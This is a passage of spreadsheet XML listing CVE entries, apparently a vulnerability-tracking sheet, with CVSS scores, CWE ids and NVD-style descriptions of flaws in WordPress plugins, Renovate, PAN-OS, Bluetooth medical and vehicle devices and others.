      </c>
      <c r="H2990" s="5" t="inlineStr"/>
      <c r="I2990" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2990" s="5" t="inlineStr"/>
      <c r="K2990" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2990" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.14.7 contains a command injection vulnerability in the gomod manager when processing unescaped depName parameters in import-path update commands with binarySource=docker mode. Attackers can inject shell metacharacters through malicious dependency names to execute arbitrary commands as the Renovate user during Go module major version updates with postUpdateOptions gomodUpdateImportPaths enabled.</t>
        </is>
      </c>
      <c r="M2990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88885</t>
        </is>
      </c>
    </row>
    <row r="2991">
      <c r="A2991" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88888</t>
        </is>
      </c>
      <c r="C2991" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2991" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2991" s="5" t="inlineStr"/>
      <c r="F2991" s="5" t="inlineStr"/>
      <c r="G2991" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2991" s="5" t="inlineStr"/>
      <c r="I2991" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2991" s="5" t="inlineStr"/>
      <c r="K2991" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2991" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.14.7 contains a command injection vulnerability in the Mix manager when processing private dependencies with unescaped organization parameters. Attackers can inject shell metacharacters through malicious package names to execute arbitrary commands as the Renovate user in binarySource=docker mode.</t>
        </is>
      </c>
      <c r="M2991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88888</t>
        </is>
      </c>
    </row>
    <row r="2992">
      <c r="A2992" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89087</t>
        </is>
      </c>
      <c r="C2992" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2992" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2992" s="5" t="inlineStr"/>
      <c r="F2992" s="5" t="inlineStr"/>
      <c r="G2992" s="5" t="inlineStr"/>
      <c r="H2992" s="5" t="inlineStr"/>
      <c r="I2992" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2992" s="5" t="inlineStr"/>
      <c r="K2992" s="5" t="inlineStr">
        <is>
          <t>CWE-573</t>
        </is>
      </c>
      <c r="L2992" s="5" t="inlineStr">
        <is>
          <t>The cstruct package before 6.3.0 for OCaml mishandles indexes.</t>
        </is>
      </c>
      <c r="M2992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89087</t>
        </is>
      </c>
    </row>
    <row r="2993">
      <c r="A2993" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0310</t>
        </is>
      </c>
      <c r="C2993" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2993" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2993" s="5" t="inlineStr"/>
      <c r="F2993" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2993" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H2993" s="5" t="inlineStr"/>
      <c r="I2993" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2993" s="5" t="inlineStr"/>
      <c r="K2993" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2993" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow vulnerability in the XML processing functionality of Palo Alto Networks PAN-OS® software enables an unauthenticated attacker with network access to the management web or dataplane interface to cause a denial of service (DoS) condition on VM-Series firewalls or execute arbitrary code with root privileges on the PA-Series firewalls.
The security risk posed by this issue is minimized when the management interface is restricted to only trusted internal IP addresses according to our recommended  best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . 
Panorama is impacted by this vulnerability.</t>
        </is>
      </c>
      <c r="M2993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0310</t>
        </is>
      </c>
    </row>
    <row r="2994">
      <c r="A2994" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13359</t>
        </is>
      </c>
      <c r="C2994" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2994" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2994" s="5" t="inlineStr"/>
      <c r="F2994" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2994" s="5" t="inlineStr"/>
      <c r="H2994" s="5" t="inlineStr"/>
      <c r="I2994" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2994" s="5" t="inlineStr"/>
      <c r="K2994" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2994" s="5" t="inlineStr">
        <is>
          <t>The Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via cntctfrm_contact_dropdown Parameter in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload executes in the context of an administrator's browser session when they visit the plugin's message manager page at /wp-admin/admin.php?page=cntctfrmtdb_manager, making it possible to compromise administrator-level sessions via a simple unauthenticated contact form submission.</t>
        </is>
      </c>
      <c r="M2994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13359</t>
        </is>
      </c>
    </row>
    <row r="2995">
      <c r="A2995" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14989</t>
        </is>
      </c>
      <c r="C2995" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2995" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2995" s="5" t="inlineStr"/>
      <c r="F2995" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2995" s="5" t="inlineStr"/>
      <c r="H2995" s="5" t="inlineStr"/>
      <c r="I2995" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2995" s="5" t="inlineStr"/>
      <c r="K2995" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2995" s="5" t="inlineStr">
        <is>
          <t>The Cookie Banner for GDPR / CCPA – WPLP Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpl_user_preference' parameter in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The consent-logging AJAX endpoint is registered for unauthenticated users and its required nonce (wpl_consent_logging_nonce) is publicly emitted via wp_localize_script on the frontend, meaning any unauthenticated site visitor can plant a payload without any prior authentication or privileged access.</t>
        </is>
      </c>
      <c r="M2995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14989</t>
        </is>
      </c>
    </row>
    <row r="2996">
      <c r="A2996" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15984</t>
        </is>
      </c>
      <c r="C2996" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2996" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2996" s="5" t="inlineStr"/>
      <c r="F2996" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2996" s="5" t="inlineStr"/>
      <c r="H2996" s="5" t="inlineStr"/>
      <c r="I2996" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2996" s="5" t="inlineStr"/>
      <c r="K2996" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2996" s="5" t="inlineStr">
        <is>
          <t>The QuickCal plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Custom Field Parameters in all versions up to, and including, 1.0.20 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce guarding the unauthenticated booked_add_appt AJAX action is publicly embedded on any page rendering the booking calendar shortcode, making it trivially obtainable by unauthenticated attackers without any prior account or privilege.</t>
        </is>
      </c>
      <c r="M2996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15984</t>
        </is>
      </c>
    </row>
    <row r="2997">
      <c r="A2997" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16649</t>
        </is>
      </c>
      <c r="C2997" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2997" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2997" s="5" t="inlineStr"/>
      <c r="F2997" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2997" s="5" t="inlineStr"/>
      <c r="H2997" s="5" t="inlineStr"/>
      <c r="I2997" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2997" s="5" t="inlineStr"/>
      <c r="K2997" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2997" s="5" t="inlineStr">
        <is>
          <t>The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Post Body Field Value in all versions up to, and including, 2.10.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploit survives save-time sanitization because wp_kses_post allows the required HTML tags and attributes, and the client-side tooltip script re-parses the browser-decoded aria-label value as innerHTML while only stripping script elements, leaving onerror and other event-handler attributes fully intact and executable.</t>
        </is>
      </c>
      <c r="M2997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16649</t>
        </is>
      </c>
    </row>
    <row r="2998">
      <c r="A2998" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17037</t>
        </is>
      </c>
      <c r="C2998" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2998" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2998" s="5" t="inlineStr"/>
      <c r="F2998" s="5" t="inlineStr"/>
      <c r="G2998" s="5" t="inlineStr"/>
      <c r="H2998" s="5" t="inlineStr"/>
      <c r="I2998" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2998" s="5" t="inlineStr"/>
      <c r="K2998" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2998" s="5" t="inlineStr">
        <is>
          <t>The Kirki – Freeform Page Builder, Website Builder &amp; Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘comment’ parameter in all versions up to, and including, 6.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M2998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17037</t>
        </is>
      </c>
    </row>
    <row r="2999">
      <c r="A2999" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17553</t>
        </is>
      </c>
      <c r="C2999" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2999" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2999" s="5" t="inlineStr"/>
      <c r="F2999" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2999" s="5" t="inlineStr"/>
      <c r="H2999" s="5" t="inlineStr"/>
      <c r="I2999" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2999" s="5" t="inlineStr"/>
      <c r="K2999" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2999" s="5" t="inlineStr">
        <is>
          <t>The WP EasyCart plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.9.3. This is due to the ec_ajax_save_page_default_options() AJAX handler iterating over every $_POST key and passing it directly into update_option() without any allowlist, while gating the handler only on 'manage_options' OR the plugin's custom 'wpec_manager' capability. The plugin's built-in 'wpec_store_manager' role holds 'wpec_manager' but not 'manage_options', and the required nonce is emitted on frontend product/category templates that render for any user with 'wpec_manager'. This makes it possible for authenticated attackers, with Store Manager-level access and above, to elevate their privileges to administrator by updating arbitrary WordPress options such as default_role='administrator' and users_can_register='1', then self-registering a new account that is assigned the administrator role.</t>
        </is>
      </c>
      <c r="M2999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17553</t>
        </is>
      </c>
    </row>
    <row r="3000">
      <c r="A3000" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18164</t>
        </is>
      </c>
      <c r="C3000" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3000" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3000" s="5" t="inlineStr"/>
      <c r="F3000" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3000" s="5" t="inlineStr"/>
      <c r="H3000" s="5" t="inlineStr"/>
      <c r="I3000" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3000" s="5" t="inlineStr"/>
      <c r="K3000" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L3000" s="5" t="inlineStr">
        <is>
          <t>An undocumented hard-coded credential, shared by all device units, is authorized to bypass authentication. This allows an attacker within Bluetooth range to arbitrarily manipulate brain stimulation parameters and state.</t>
        </is>
      </c>
      <c r="M3000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18164</t>
        </is>
      </c>
    </row>
    <row r="3001">
      <c r="A3001" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18255</t>
        </is>
      </c>
      <c r="C3001" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3001" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3001" s="5" t="inlineStr"/>
      <c r="F3001" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3001" s="5" t="inlineStr"/>
      <c r="H3001" s="5" t="inlineStr"/>
      <c r="I3001" s="5" t="inlineStr">
        <is>
          <t>2026-07-29</t>
        </is>
      </c>
      <c r="J3001" s="5" t="inlineStr"/>
      <c r="K3001" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3001" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Quay. A user configured in GLOBAL_READONLY_SUPER_USERS is able to view robot account tokens for repositories they are not a member of, allowing an attacker with read-only superuser privileges to impersonate any robot account.</t>
        </is>
      </c>
      <c r="M3001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18255</t>
        </is>
      </c>
    </row>
    <row r="3002">
      <c r="A3002" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18406</t>
        </is>
      </c>
      <c r="C3002" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3002" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3002" s="5" t="inlineStr"/>
      <c r="F3002" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3002" s="5" t="inlineStr"/>
      <c r="H3002" s="5" t="inlineStr"/>
      <c r="I3002" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3002" s="5" t="inlineStr"/>
      <c r="K3002" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3002" s="5" t="inlineStr">
        <is>
          <t>The SureForms – Contact Form Builder, AI Forms, Payment Form, Survey &amp; Quiz plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Text Field Entity-Encoded Payload in all versions up to, and including, 2.12.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M3002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18406</t>
        </is>
      </c>
    </row>
    <row r="3003">
      <c r="A3003" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18411</t>
        </is>
      </c>
      <c r="C3003" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3003" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3003" s="5" t="inlineStr"/>
      <c r="F3003" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3003" s="5" t="inlineStr"/>
      <c r="H3003" s="5" t="inlineStr"/>
      <c r="I3003" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J3003" s="5" t="inlineStr"/>
      <c r="K3003" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L3003" s="5" t="inlineStr">
        <is>
          <t>The KARR Security System and SWDS dealer-installed automotive anti-theft systems use a shared Bluetooth authentication key across affected devices. An attacker within Bluetooth range can leverage this weakness to issue unauthorized commands to the vehicle, potentially allowing unauthorized access to vehicle functions, including door unlocking and engine immobilization.</t>
        </is>
      </c>
      <c r="M3003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18411</t>
        </is>
      </c>
    </row>
    <row r="3004">
      <c r="A3004" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18579</t>
        </is>
      </c>
      <c r="C3004" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3004" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3004" s="5" t="inlineStr"/>
      <c r="F3004" s="5" t="inlineStr"/>
      <c r="G3004" s="5" t="inlineStr"/>
      <c r="H3004" s="5" t="inlineStr"/>
      <c r="I3004" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3004" s="5" t="inlineStr"/>
      <c r="K3004" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3004" s="5" t="inlineStr">
        <is>
          <t>The WP Photo Album Plus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'HTTP_X_FORWARDED_FOR' parameter in all versions up to, and including, 9.2.08.003 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce failure path for the getshortcodedrenderedfenodelay action serves as the log-write trigger rather than an access barrier — a deliberately failed nonce check causes wppa_log() to record the attacker-supplied X-Forwarded-For value to disk, making the exploit fully reachable by unauthenticated callers via the wp_ajax_nopriv_wppa endpoint.</t>
        </is>
      </c>
      <c r="M3004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18579</t>
        </is>
      </c>
    </row>
    <row r="3005">
      <c r="A3005" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18844</t>
        </is>
      </c>
      <c r="C3005" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3005" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3005" s="5" t="inlineStr"/>
      <c r="F3005" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3005" s="5" t="inlineStr"/>
      <c r="H3005" s="5" t="inlineStr"/>
      <c r="I3005" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3005" s="5" t="inlineStr"/>
      <c r="K3005" s="5" t="inlineStr">
        <is>
          <t>CWE-912</t>
        </is>
      </c>
      <c r="L3005" s="5" t="inlineStr">
        <is>
          <t>The firmware of the Pulsetto Vagus Nerve Stimulator accepts several undisclosed commands over its Bluetooth Low Energy (BLE) interface. These commands are sent without authentication or encryption, and are never issued by the companion mobile application, yet are fully processed by the device when it is powered on.</t>
        </is>
      </c>
      <c r="M3005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18844</t>
        </is>
      </c>
    </row>
    <row r="3006">
      <c r="A3006" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19224</t>
        </is>
      </c>
      <c r="C3006" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3006" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3006" s="5" t="inlineStr"/>
      <c r="F3006" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3006" s="5" t="inlineStr"/>
      <c r="H3006" s="5" t="inlineStr"/>
      <c r="I3006" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3006" s="5" t="inlineStr"/>
      <c r="K3006" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3006" s="5" t="inlineStr">
        <is>
          <t>The Hummingbird Performance  WordPress plugin before 3.21.2 does not restrict a network-wide setting to network administrators, allowing an administrator of any single site on a multisite network to execute arbitrary code across the entire network.</t>
        </is>
      </c>
      <c r="M3006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19224</t>
        </is>
      </c>
    </row>
    <row r="3007">
      <c r="A3007" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19769</t>
        </is>
      </c>
      <c r="C3007" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3007" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3007" s="5" t="inlineStr"/>
      <c r="F3007" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3007" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3007" s="5" t="inlineStr"/>
      <c r="I3007" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3007" s="5" t="inlineStr"/>
      <c r="K3007" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3007" s="5" t="inlineStr">
        <is>
          <t>The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeater Child 'type' Confusion via Unmatched Array Key in all versions up to, and including, 3.15.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the Ninja Forms File Uploads add-on to be active, as the attack routes the unwhitelisted child entry through the File Uploads handler to write an attacker-supplied HTML file containing arbitrary JavaScript into any web-server-writable directory, including the site root, where it is served from the site's own origin.</t>
        </is>
      </c>
      <c r="M3007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19769</t>
        </is>
      </c>
    </row>
    <row r="3008">
      <c r="A3008" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23855</t>
        </is>
      </c>
      <c r="C3008" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3008" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3008" s="5" t="inlineStr"/>
      <c r="F3008" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3008" s="5" t="inlineStr"/>
      <c r="H3008" s="5" t="inlineStr"/>
      <c r="I3008" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3008" s="5" t="inlineStr"/>
      <c r="K3008" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3008" s="5" t="inlineStr">
        <is>
          <t>Dell iDRAC9, 14G versions prior to 7.00.00.184, 15G/16G versions prior to 7.30.10.50, and Dell iDRAC10, 17G versions prior to 1.30.30.50, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to command injection.</t>
        </is>
      </c>
      <c r="M3008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23855</t>
        </is>
      </c>
    </row>
    <row r="3009">
      <c r="A3009" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27459</t>
        </is>
      </c>
      <c r="C3009" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3009" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3009" s="5" t="inlineStr"/>
      <c r="F3009" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3009" s="5" t="inlineStr">
        <is>
          <t>openssl, python</t>
        </is>
      </c>
      <c r="H3009" s="5" t="inlineStr">
        <is>
          <t>pyopenssl:pyopenssl</t>
        </is>
      </c>
      <c r="I3009" s="5" t="inlineStr">
        <is>
          <t>2026-03-18</t>
        </is>
      </c>
      <c r="J3009" s="5" t="inlineStr"/>
      <c r="K3009" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L3009" s="5" t="inlineStr">
        <is>
          <t>pyOpenSSL is a Python wrapper around the OpenSSL library. Starting in version 22.0.0 and prior to version 26.0.0, if a user provided callback to `set_cookie_generate_callback` returned a cookie value greater than 256 bytes, pyOpenSSL would overflow an OpenSSL provided buffer. Starting in version 26.0.0, cookie values that are too long are now rejected.</t>
        </is>
      </c>
      <c r="M3009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27459</t>
        </is>
      </c>
    </row>
    <row r="3010">
      <c r="A3010" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34968</t>
        </is>
      </c>
      <c r="C3010" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3010" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3010" s="5" t="inlineStr"/>
      <c r="F3010" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3010" s="5" t="inlineStr"/>
      <c r="H3010" s="5" t="inlineStr"/>
      <c r="I3010" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3010" s="5" t="inlineStr"/>
      <c r="K3010" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3010" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 contains an arbitrary file deletion vulnerability in SQLite mode where the database-list drop action fails to validate file extensions before deletion. An authenticated attacker can submit arbitrary relative file paths in the db[] parameter to delete any files writable by the PHP process.</t>
        </is>
      </c>
      <c r="M3010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34968</t>
        </is>
      </c>
    </row>
    <row r="3011">
      <c r="A3011" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38710</t>
        </is>
      </c>
      <c r="C3011" s="5" t="n">
        <v>7.2</v>
